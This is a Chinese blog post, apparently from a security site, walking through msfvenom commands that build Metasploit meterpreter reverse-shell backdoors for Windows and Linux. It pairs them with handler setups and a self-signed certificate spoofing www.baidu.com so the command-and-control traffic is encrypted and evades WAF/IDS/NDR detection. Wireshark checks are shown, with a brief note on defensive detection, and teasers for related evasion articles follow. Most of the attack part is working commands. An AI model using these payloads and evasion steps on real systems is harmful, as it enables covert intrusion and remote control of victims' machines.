<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    MSF監聽之加密流量下的后門上線

    一顆小胡椒2022-05-24 10:34:27

    0x00寫在前面

    本次測試僅供學習使用,如若非法他用,與平臺和本文作者無關,需自行負責!

    0x01背景描述

    在攻防對抗過程中的橫行滲透,經常需要msf進行攻擊操作,如果msf上線shell過程中流量是明文傳輸,那么內網環境中已有的安全檢測產品(WAF/IPS/IDS/NDR/HIDS)等防護軟件會進行流量檢測,明文傳輸帶有明顯的攻擊特征。很快會被檢測發現,防守方對攻擊流量回溯分析,就會阻斷攻擊行為。

    0x02明文流量

    win環境

    1.生成上線后門

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.86.2 LPORT=12377 -f exe > yun.exe
    

    2.設置msf監聽

    3.成功上線shell

    將生成的后門程序上傳到目標服務器進行執行。

    后門上線

    4.分析流量

    通過Wireshark抓包分析流量,整個通信過程全部為明文傳輸

    通信過程由受害主機發起

    過濾tcp目的端口

    tcp.dstport == 12377

    追蹤tcp數據流

    通過分析可以發現,該tcp連接由服務器端發起,傳輸數據為明文信息

    Linux環境

    1.生成上線后門

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.86.2 LPORT=12399 -f elf > yun.elf
    

    2.設置msf監聽

    msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcppayload => linux/x64/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lhost 192.168.86.2lhost => 192.168.86.2msf5 exploit(multi/handler) > set lport 12399lport => 12399msf5 exploit(multi/handler) >
    

    3.成功上線shell

    將生成的后門程序上傳到目標服務器進行執行。

    獲取meterpreter會話

    4.分析流量

    通過Wireshark抓包分析流量,整個通信過程全部為明文傳輸

    通信過程由受害主機發起

    過濾tcp目的端口

    tcp.dstport == 12399

    追蹤tcp數據流

    通過分析可以發現,該tcp連接由服務器端發起,傳輸數據為明文信息

    0x03加密流量(windows)

    通過使用OpenSSL流量加密

    1.生成OpenSSL證書

    openssl req -new -newkey rsa:4096 -days 365 -nodes -x509-subj "/C=UK/ST=London/L=London/O=Development/CN=www.baidu.com"-keyout www.baidu.com.key-out www.baidu.com.crt &&cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem &&rm -f www.baidu.com.key www.baidu.com.crt
    

    2.使用證書生成后門

    windows

    msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.86.2 LPORT=4433 PayloadUUIDTracking=true HandlerSSLCert=www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o zui.exe
    

    bat后門

    msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.86.2 LPORT=4433 PayloadUUIDTracking=true HandlerSSLCert=www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o zui.bat
    

    3.設置msf監聽

    msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_winhttpspayload => windows/x64/meterpreter/reverse_winhttpsmsf5 exploit(multi/handler) > set lhost 192.168.86.2lhost => 192.168.86.2msf5 exploit(multi/handler) > set lport 4433lport => 4433msf5 exploit(multi/handler) > set handlersslcert www.baidu.com.pemhandlersslcert => www.baidu.com.pemmsf5 exploit(multi/handler) > set stagerverifysslcert true
    

    3.成功上線shell

    注意:windows 7環境下通過OpenSSL流量加密無法上線成功!

    以下是運行結果

    連接超時無法上線

    更換window10 環境,成功上線

    執行程序,獲取會話

    4.分析流量

    通過Wireshark抓包分析流量,整個通信過程全部為加密流量傳輸

    通信過程由受害主機發起

    過濾tcp目的端口

    tcp.dstport == 4433

    追蹤tcp數據流

    通過分析可以發現,該tcp連接由服務器端發起,傳輸數據為加密信息

    0x04思考

    安全的本質就是對抗!針對加密流量的檢測,傳統的基于特征的檢測已經無法滿足攻擊發展的趨勢,只有通過不斷引入新的檢測思考才能解決。

    加密流量的檢測,業界主流有2種方法:

    第一種是將加密流量進行解密并進行檢測,這需要安全檢測設備充當通信雙方的代理或者由客戶提供單獨的解密證書(只能針對該證書對應的加密流量進行解碼)

    第二種是在不解密的情況下進行安全檢測,這通常會采用(AI)機器學習的方法。

    當然對攻擊行為的感知,也可以通過威脅狩獵發現。

    流量msf
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    一、環境配置靶機下載地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2攻擊示意圖:靶機統一使用虛擬機搭建web服務器:windows7 ip:192.168.52.143/192.168.154.152域成員:windows server 2003 ip:192.168.52.141域控:windows server 2008 ip:192.16
    MSF+生成流量免殺木馬
    2022-01-14 11:34:16
    在實戰中,即便你繞過了殺毒軟件的檢測,也很有可能會結束在某些流量監控的設備上。MSF可以說其是每一個內網玩家的必用工具。理所當然,這款工具也自然而然地被各大安全廠商分析,捕捉其在命令執行時產生的數據和流量。當我們使用一個沒有做過加密處理的原版工具時,內網中的安全設備會根據我們的流量特征進行判斷,認定我們為惡意進程,從而導致控制中斷。Meterpreter技巧生成后門msfvenom?
    REW-sploit是一款功能強大的攻擊分析工具,它可以幫助我們分析Windows Shellcode或其他來自Metasploit/Cobalt Strike的攻擊活動。
    0x00寫在前面本次測試僅供學習使用,如若非法他用,與平臺和本文作者無關,需自行負責!很快會被檢測發現,防守方對攻擊流量回溯分析,就會阻斷攻擊行為。針對加密流量的檢測,傳統的基于特征的檢測已經無法滿足攻擊發展的趨勢,只有通過不斷引入新的檢測思考才能解決。
    在最近的CTF比賽中,綜合靶場出現的次數越來越多,這種形式的靶場和真實的內網滲透很像,很貼合實際工作,但我們往往缺少多層網絡的練習環境。本文通過VMware搭建3層網絡,并通過msf進行內網滲透,涉及代理搭建,流量轉發,端口映射等常見內網滲透技術。
    首先對ubuntu進行端口掃描,發現開了21、22、80、888、3306、8888端口
    近年來,加密流量在攻防對抗中的使用頻率越來越高,針對攻防演練場景下的加密流量威脅,特別是資產失陷后的加密C&C通信的檢測,可以說是守護企業網絡的最后一道防線。這些Webshell既能在失陷的Web服務器與攻擊者之間維持命令執行通道,又能用來上傳具有更強大功能的平臺級木馬。
    TLS/SSL木馬回連出入企業網絡邊界最常見的加密協議是TLS/SSL,其廣泛應用于Web服務、郵件服務、文件傳輸、移動APP等應用領域,可以保護用戶通信數據的機密性和完整性。在2022年的攻防演練中,觀成瞰云-加密威脅智能檢測系統首次參與即有亮眼發揮,多次獨家檢出攻擊失陷階段的加密C&C通信行為,做到及時發現,及時預警,為客戶最大程度減少損失做出貢獻。
    0x00 介紹工具介紹RedGuard,是一款C2設施前置流量控制技術的衍生作品,有著更加輕量的設計、高效的流量交互、以及使用go語言開發具有的可靠兼容性。它所解決的核心問題也是在面對日益復雜的紅藍攻防演練行動中,給予攻擊隊更加優秀的C2基礎設施隱匿方案,賦予C2設施的交互流量流量控制功能,攔截那些“惡意”的分析流量,更好的完成整個攻擊任務。RedGuard是一個C2設施前置流量控制工具,可以避免Blue Team,AVS,EDR,Cyberspace Search Engine的檢查。
    0x00 介紹工具介紹RedGuard,是一款C2設施前置流量控制技術的衍生作品,有著更加輕量的設計、高效的流量交互、以及使用go語言開發具有的可靠兼容性。它所解決的核心問題也是在面對日益復雜的紅藍攻防演練行動中,給予攻擊隊更加優秀的C2基礎設施隱匿方案,賦予C2設施的交互流量流量控制功能,攔截那些“惡意”的分析流量,更好的完成整個攻擊任務。RedGuard是一個C2設施前置流量控制工具,可以避免Blue Team,AVS,EDR,Cyberspace Search Engine的檢查。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类